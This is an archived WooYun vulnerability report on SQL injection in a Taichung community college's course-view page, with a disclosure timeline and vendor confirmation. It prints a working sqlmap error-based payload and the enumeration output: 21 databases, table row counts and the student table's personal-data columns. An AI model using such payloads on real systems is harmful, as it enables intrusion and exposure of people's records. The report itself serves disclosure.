
Vulnerability summary

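Bug ID: wooyun-2015-0159763

Title: SQL injection at 臺中市山線社區大學 / 21 tables (Taiwan region)

Vendor: 臺中市山線社區大學

Author: 路人甲

Submitted: 2015-12-10 15:51

Fixed: 2016-01-28 17:39

Disclosed: 2016-01-28 17:39

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]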


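Vulnerability details

Disclosure status:

2015-12-10: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

Detailed description:

Injection point: http://**.**.**.**/cc2/courseview.asp?classnum=CC10326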

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: classnum (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classnum=CC10326' AND 7817=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Uwnu'='Uwnu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current database: 'ec2'
current user is DBA: False
available databases [21]:
[*] account
[*] AdventureWorks
[*] AdventureWorksDW
[*] DB_hr
[*] DB_Question
[*] ec2
[*] ec3
[*] labor
[*] labor_coop
[*] MagicDocDB
[*] master
[*] model
[*] msdb
[*] ppactivity
[*] prothrows
[*] tempdb
[*] texam_bicy
[*] twcb
[*] wealthy
[*] wealthy1
[*] young_plan


There are too many databases, so let's just look at a few:

Database: ec2
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.regist_detail | 197101 |
| dbo.regist | 178810 |
| dbo.pay_d | 177568 |
| dbo.Vregnum | 161700 |
| dbo.Ucard | 122185 |
| dbo.course_report | 108840 |
| dbo.student | 79289 |
| dbo.Rd_card | 66597 |
| dbo.pay_m | 52283 |
| dbo.course | 37117 |
| dbo.web_student | 34592 |
| dbo.Add3 | 27744 |
| dbo.sys_record | 24597 |
| dbo.sortcourse | 23294 |
| dbo.Ucardprint | 16849 |
| dbo.web_regist | 16189 |
| dbo.s01_reader | 12430 |
| dbo.web_regist_detail | 11633 |
| dbo.deposit | 5043 |
| dbo.customer | 4455 |
| dbo.salary | 4425 |
| dbo.teacher | 4312 |
| dbo.teacher_bak | 3217 |
| dbo.s02_reader | 2176 |
| dbo.lack | 2139 |
| dbo.class | 1827 |
| dbo.slabor_reader | 1418 |
| dbo.question | 1259 |
| dbo.web_regist_detail_tqc | 1092 |
| dbo.S02_sentrecord | 917 |
| dbo.Rd_card2 | 849 |
| dbo.web_student_tqc | 818 |
| dbo.web_regist_tqc | 704 |
| dbo.Tick_seq | 532 |
| dbo.class_kind | 484 |
| dbo.cmail | 368 |
| dbo.Add2 | 366 |
| dbo.member | 336 |
| dbo.Assign_work | 243 |
| dbo.s01_enews | 166 |
| dbo.apply | 82 |
| dbo.department | 56 |
| dbo.sysform | 54 |
| dbo.place_base | 27 |
| dbo.Add1 | 26 |
| dbo.meet_company | 23 |
| dbo.FT_User | 20 |
| dbo.users | 17 |
| dbo.do_unit | 16 |
| dbo.s02_enews | 15 |
| dbo.agio | 13 |
| dbo.class_board | 11 |
| dbo.charge_set | 6 |
| dbo.dep | 5 |
| dbo.grade | 3 |
| dbo.lease_data | 2 |
| dbo.usergroup | 2 |
| dbo.app_data | 1 |
| dbo.counters | 1 |
| dbo.inschool | 1 |
| dbo.System | 1 |
| dbo.ucard_ad | 1 |
| dbo.web_counters | 1 |
+---------------------------+---------+


Database: ec2
Table: student
[34 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| academic | varchar |
| add_c | varchar |
| b_b_call | varchar |
| bank | varchar |
| bankid | varchar |
| birthday | varchar |
| cell_call | varchar |
| company | varchar |
| company_add | varchar |
| company_zip | varchar |
| dept_id | varchar |
| duty | varchar |
| email | varchar |
| fax | varchar |
| finish | varchar |
| grade_date | varchar |
| how1 | bit |
| how2 | bit |
| how3 | bit |
| how4 | bit |
| id | varchar |
| keyin | varchar |
| memo | varchar |
| name | varchar |
| s_date | varchar |
| s_duty | varchar |
| s_level | varchar |
| s_number | varchar |
| school | varchar |
| seq | varchar |
| slevel | int |
| tel_h | varchar |
| tel_o | varchar |
| zip | varchar |
+-------------+---------+


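A look at some of the data (screenshot: 111111111111.png)

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)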


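Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-12-14 23:29

Vendor reply:

Thank you for the report.

Latest status:

None yet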